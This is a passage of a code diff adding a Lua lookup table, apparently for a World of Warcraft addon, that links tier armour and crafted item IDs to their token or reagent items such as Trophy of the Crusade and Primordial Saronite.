}, + -- Nobundo's Hauberk of Triumph + ["48325"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Hauberk of Triumph + ["48326"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Gloves of Triumph + ["48327"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Helm of Triumph + ["48328"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Kilt of Triumph + ["48329"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Shoulderpads of Triumph + ["48330"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Shoulderpads of Triumph + ["48331"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Kilt of Triumph + ["48332"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Helm of Triumph + ["48333"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Gloves of Triumph + ["48334"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Hauberk of Triumph + ["48335"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Chestguard of Triumph + ["48346"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Grips of Triumph + ["48347"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Faceguard of Triumph + ["48348"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's War-Kilt of Triumph + ["48349"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Shoulderguards of Triumph + ["48350"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Shoulderguards of Triumph + ["48351"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's War-Kilt of Triumph + ["48352"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Faceguard of Triumph + ["48353"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Grips of Triumph + ["48354"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Chestguard of Triumph + ["48355"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Chestguard of Triumph + ["48356"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Grips of Triumph + ["48357"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Faceguard of Triumph + ["48358"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's War-Kilt of Triumph + ["48359"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Shoulderguards of Triumph + ["48360"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Shoulderguards of Triumph + ["48361"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's War-Kilt of Triumph + ["48362"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Faceguard of Triumph + ["48363"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Grips of Triumph + ["48364"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Chestguard of Triumph + ["48365"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Battleplate of Triumph + ["48376"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Gauntlets of Triumph + ["48377"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Helmet of Triumph + ["48378"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Legplates of Triumph + ["48379"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Shoulderplates of Triumph + ["48380"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Shoulderplates of Triumph + ["48381"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Legplates of Triumph + ["48382"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Helmet of Triumph + ["48383"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Gauntlets of Triumph + ["48384"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Battleplate of Triumph + ["48385"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Battleplate of Triumph + ["48391"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Gauntlets of Triumph + ["48392"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Helmet of Triumph + ["48393"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Legplates of Triumph + ["48394"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Shoulderplates of Triumph + ["48395"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Battleplate of Triumph + ["48396"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Gauntlets of Triumph + ["48397"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Helmet of Triumph + ["48398"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Legplates of Triumph + ["48399"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Shoulderplates of Triumph + ["48400"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Greathelm of Triumph + ["48430"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Greathelm of Triumph + ["48433"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Legguards of Triumph + ["48446"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Legguards of Triumph + ["48447"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Breastplate of Triumph + ["48450"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Breastplate of Triumph + ["48451"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Handguards of Triumph + ["48452"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Handguards of Triumph + ["48453"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Wrynn's Pauldrons of Triumph + ["48454"] = { + 47242, -- Trophy of the Crusade + }, + -- Wrynn's Pauldrons of Triumph + ["48455"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Breastplate of Triumph + ["48461"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Handguards of Triumph + ["48462"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Greathelm of Triumph + ["48463"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Legguards of Triumph + ["48464"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Pauldrons of Triumph + ["48465"] = { + 47242, -- Trophy of the Crusade + }, + -- Hellscream's Breastplate of Triumph + ["48466"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Handguards of Triumph + ["48467"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Greathelm of Triumph + ["48468"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Legguards of Triumph + ["48469"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Hellscream's Pauldrons of Triumph + ["48470"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thassarian's Battleplate of Triumph + ["48481"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Gauntlets of Triumph + ["48482"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Helmet of Triumph + ["48483"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Legplates of Triumph + ["48484"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Shoulderplates of Triumph + ["48485"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Shoulderplates of Triumph + ["48486"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Legplates of Triumph + ["48487"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Helmet of Triumph + ["48488"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Gauntlets of Triumph + ["48489"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Battleplate of Triumph + ["48490"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Battleplate of Triumph + ["48491"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Gauntlets of Triumph + ["48492"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Helmet of Triumph + ["48493"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Legplates of Triumph + ["48494"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Shoulderplates of Triumph + ["48495"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Shoulderplates of Triumph + ["48496"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Legplates of Triumph + ["48497"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Helmet of Triumph + ["48498"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Gauntlets of Triumph + ["48499"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Battleplate of Triumph + ["48500"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Chestguard of Triumph + ["48538"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Handguards of Triumph + ["48539"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Faceguard of Triumph + ["48540"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Legguards of Triumph + ["48541"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Pauldrons of Triumph + ["48542"] = { + 47242, -- Trophy of the Crusade + }, + -- Thassarian's Pauldrons of Triumph + ["48543"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Legguards of Triumph + ["48544"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Faceguard of Triumph + ["48545"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Handguards of Triumph + ["48546"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Thassarian's Chestguard of Triumph + ["48547"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Chestguard of Triumph + ["48548"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Handguards of Triumph + ["48549"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Faceguard of Triumph + ["48550"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Legguards of Triumph + ["48551"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Pauldrons of Triumph + ["48552"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Koltira's Pauldrons of Triumph + ["48553"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Legguards of Triumph + ["48554"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Faceguard of Triumph + ["48555"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Handguards of Triumph + ["48556"] = { + 47242, -- Trophy of the Crusade + }, + -- Koltira's Chestguard of Triumph + ["48557"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Tunic of Triumph + ["48575"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Gloves of Triumph + ["48576"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Headpiece of Triumph + ["48577"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Greaves of Triumph + ["48578"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Spaulders of Triumph + ["48579"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Spaulders of Triumph + ["48580"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Greaves of Triumph + ["48581"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Headpiece of Triumph + ["48582"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Gloves of Triumph + ["48583"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Tunic of Triumph + ["48584"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Spaulders of Triumph + ["48585"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Greaves of Triumph + ["48586"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Headpiece of Triumph + ["48587"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Gloves of Triumph + ["48588"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Tunic of Triumph + ["48589"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Spaulders of Triumph + ["48590"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Greaves of Triumph + ["48591"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Headpiece of Triumph + ["48592"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Gloves of Triumph + ["48593"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Tunic of Triumph + ["48594"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Battleplate of Triumph + ["48607"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Gauntlets of Triumph + ["48608"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Helm of Triumph + ["48609"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Legplates of Triumph + ["48610"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Shoulderplates of Triumph + ["48611"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Shoulderplates of Triumph + ["48612"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Legplates of Triumph + ["48613"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Helm of Triumph + ["48614"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Gauntlets of Triumph + ["48615"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Battleplate of Triumph + ["48616"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Battleplate of Triumph + ["48617"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Gauntlets of Triumph + ["48618"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Helm of Triumph + ["48619"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Legplates of Triumph + ["48620"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Shoulderplates of Triumph + ["48621"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Shoulderplates of Triumph + ["48622"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Legplates of Triumph + ["48623"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Helm of Triumph + ["48624"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Gauntlets of Triumph + ["48625"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Battleplate of Triumph + ["48626"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Shoulderguards of Triumph + ["48637"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Legguards of Triumph + ["48638"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Faceguard of Triumph + ["48639"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Handguards of Triumph + ["48640"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Breastplate of Triumph + ["48641"] = { + 47242, -- Trophy of the Crusade + }, + -- Turalyon's Breastplate of Triumph + ["48642"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Handguards of Triumph + ["48643"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Faceguard of Triumph + ["48644"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Legguards of Triumph + ["48645"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Turalyon's Shoulderguards of Triumph + ["48646"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Shoulderguards of Triumph + ["48647"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Legguards of Triumph + ["48648"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Faceguard of Triumph + ["48649"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Handguards of Triumph + ["48650"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Breastplate of Triumph + ["48651"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Liadrin's Breastplate of Triumph + ["48657"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Handguards of Triumph + ["48658"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Faceguard of Triumph + ["48659"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Legguards of Triumph + ["48660"] = { + 47242, -- Trophy of the Crusade + }, + -- Liadrin's Shoulderguards of Triumph + ["48661"] = { + 47242, -- Trophy of the Crusade + }, + -- Shadowmourne + ["49623"] = { + 50274, -- Shadowfrost Shard + }, + -- Deathfrost Boots + ["49890"] = { + 49908, -- Primordial Saronite + }, + -- Leggings of Woven Death + ["49891"] = { + 49908, -- Primordial Saronite + }, + -- Lightweave Leggings + ["49892"] = { + 49908, -- Primordial Saronite + }, + -- Sandals of Consecration + ["49893"] = { + 49908, -- Primordial Saronite + }, + -- Blessed Cenarion Boots + ["49894"] = { + 49908, -- Primordial Saronite + }, + -- Footpads of Impending Death + ["49895"] = { + 49908, -- Primordial Saronite + }, + -- Earthsoul Boots + ["49896"] = { + 49908, -- Primordial Saronite + }, + -- Rock-Steady Treads + ["49897"] = { + 49908, -- Primordial Saronite + }, + -- Legwraps of Unleashed Nature + ["49898"] = { + 49908, -- Primordial Saronite + }, + -- Bladeborn Leggings + ["49899"] = { + 49908, -- Primordial Saronite + }, + -- Lightning-Infused Leggings + ["49900"] = { + 49908, -- Primordial Saronite + }, + -- Draconic Bonesplinter Legguards + ["49901"] = { + 49908, -- Primordial Saronite + }, + -- Puresteel Legplates + ["49902"] = { + 49908, -- Primordial Saronite + }, + -- Legplates of Painful Death + ["49903"] = { + 49908, -- Primordial Saronite + }, + -- Pillars of Might + ["49904"] = { + 49908, -- Primordial Saronite + }, + -- Protectors of Life + ["49905"] = { + 49908, -- Primordial Saronite + }, + -- Hellfrozen Bonegrinders + ["49906"] = { + 49908, -- Primordial Saronite + }, + -- Boots of Kingly Upheaval + ["49907"] = { + 49908, -- Primordial Saronite + }, + -- Primordial Saronite + ["49908"] = { + 49890, -- Deathfrost Boots + 49891, -- Leggings of Woven Death + 49892, -- Lightweave Leggings + 49893, -- Sandals of Consecration + 49894, -- Blessed Cenarion Boots + 49895, -- Footpads of Impending Death + 49896, -- Earthsoul Boots + 49897, -- Rock-Steady Treads + 49898, -- Legwraps of Unleashed Nature + 49899, -- Bladeborn Leggings + 49900, -- Lightning-Infused Leggings + 49901, -- Draconic Bonesplinter Legguards + 49902, -- Puresteel Legplates + 49903, -- Legplates of Painful Death + 49904, -- Pillars of Might + 49905, -- Protectors of Life + 49906, -- Hellfrozen Bonegrinders + 49907, -- Boots of Kingly Upheaval + 49953, -- Pattern: Leggings of Woven Death + 49954, -- Pattern: Deathfrost Boots + 49955, -- Pattern: Lightweave Leggings + 49956, -- Pattern: Sandals of Consecration + 49957, -- Pattern: Legwraps of Unleashed Nature + 49958, -- Pattern: Blessed Cenarion Boots + 49959, -- Pattern: Bladeborn Leggings + 49961, -- Pattern: Footpads of Impending Death + 49962, -- Pattern: Lightning-Infused Leggings + 49963, -- Pattern: Earthsoul Boots + 49965, -- Pattern: Draconic Bonesplinter Legguards + 49966, -- Pattern: Rock-Steady Treads + 49969, -- Plans: Puresteel Legplates + 49970, -- Plans: Protectors of Life + 49971, -- Plans: Legplates of Painful Death + 49972, -- Plans: Hellfrozen Bonegrinders + 49973, -- Plans: Pillars of Might + 49974, -- Plans: Boots of Kingly Upheaval + }, + -- Pattern: Leggings of Woven Death + ["49953"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Deathfrost Boots + ["49954"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Lightweave Leggings + ["49955"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Sandals of Consecration + ["49956"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Legwraps of Unleashed Nature + ["49957"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Blessed Cenarion Boots + ["49958"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Bladeborn Leggings + ["49959"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Footpads of Impending Death + ["49961"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Lightning-Infused Leggings + ["49962"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Earthsoul Boots + ["49963"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Draconic Bonesplinter Legguards + ["49965"] = { + 49908, -- Primordial Saronite + }, + -- Pattern: Rock-Steady Treads + ["49966"] = { + 49908, -- Primordial Saronite + }, + -- Plans: Puresteel Legplates + ["49969"] = { + 49908, -- Primordial Saronite + }, + -- Plans: Protectors of Life + ["49970"] = { + 49908, -- Primordial Saronite + }, + -- Plans: Legplates of Painful Death + ["49971"] = { + 49908, -- Primordial Saronite + }, + -- Plans: Hellfrozen Bonegrinders + ["49972"] = { + 49908, -- Primordial Saronite + }, + -- Plans: Pillars of Might + ["49973"] = { + 49908, -- Primordial Saronite + }, + -- Plans: Boots of Kingly Upheaval + ["49974"] = { + 49908, -- Primordial Saronite + }, + -- Shadowfrost Shard + ["50274"] = { + 49623, -- Shadowmourne + }, + -- Sanctified Scourgelord Shoulderplates + ["51125"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Legplates + ["51126"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Helmet + ["51127"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Gauntlets + ["51128"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Battleplate + ["51129"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Pauldrons + ["51130"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Legguards + ["51131"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Handguards + ["51132"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Faceguard + ["51133"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Chestguard + ["51134"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Pauldrons + ["51135"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Legplates + ["51136"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Helmet + ["51137"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Gauntlets + ["51138"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Robes + ["51139"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Shoulderpads + ["51140"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Raiment + ["51141"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Legguards + ["51142"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Headguard + ["51143"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Handgrips + ["51144"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Vestment + ["51145"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Trousers + ["51146"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Mantle + ["51147"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Gloves + ["51148"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Cover + ["51149"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Tunic + ["51150"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Spaulders + ["51151"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Legguards + ["51152"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Headpiece + ["51153"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Handguards + ["51154"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Bloodmage Shoulderpads + ["51155"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Robe + ["51156"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Leggings + ["51157"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Hood + ["51158"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Gloves + ["51159"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lightsworn Shoulderplates + ["51160"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Legplates + ["51161"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Helmet + ["51162"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Gauntlets + ["51163"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Battleplate + ["51164"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Tunic + ["51165"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Spaulders + ["51166"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Headpiece + ["51167"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Greaves + ["51168"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Gloves + ["51169"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Shoulderguards + ["51170"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Legguards + ["51171"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Handguards + ["51172"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Faceguard + ["51173"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Chestguard + ["51174"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Shoulderpads + ["51175"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Robe + ["51176"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Leggings + ["51177"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Hood + ["51178"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Gloves + ["51179"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Raiments + ["51180"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Pants + ["51181"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Mantle + ["51182"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Handwraps + ["51183"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Cowl + ["51184"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Shadowblade Pauldrons + ["51185"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Legplates + ["51186"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Helmet + ["51187"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Gauntlets + ["51188"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Breastplate + ["51189"] = { + 52025, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Frost Witch's Tunic + ["51190"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Handguards + ["51191"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Headpiece + ["51192"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Legguards + ["51193"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Spaulders + ["51194"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Chestguard + ["51195"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Grips + ["51196"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Faceguard + ["51197"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's War-Kilt + ["51198"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Shoulderguards + ["51199"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Hauberk + ["51200"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Gloves + ["51201"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Helm + ["51202"] = { + 52026, -- Protector's Mark of 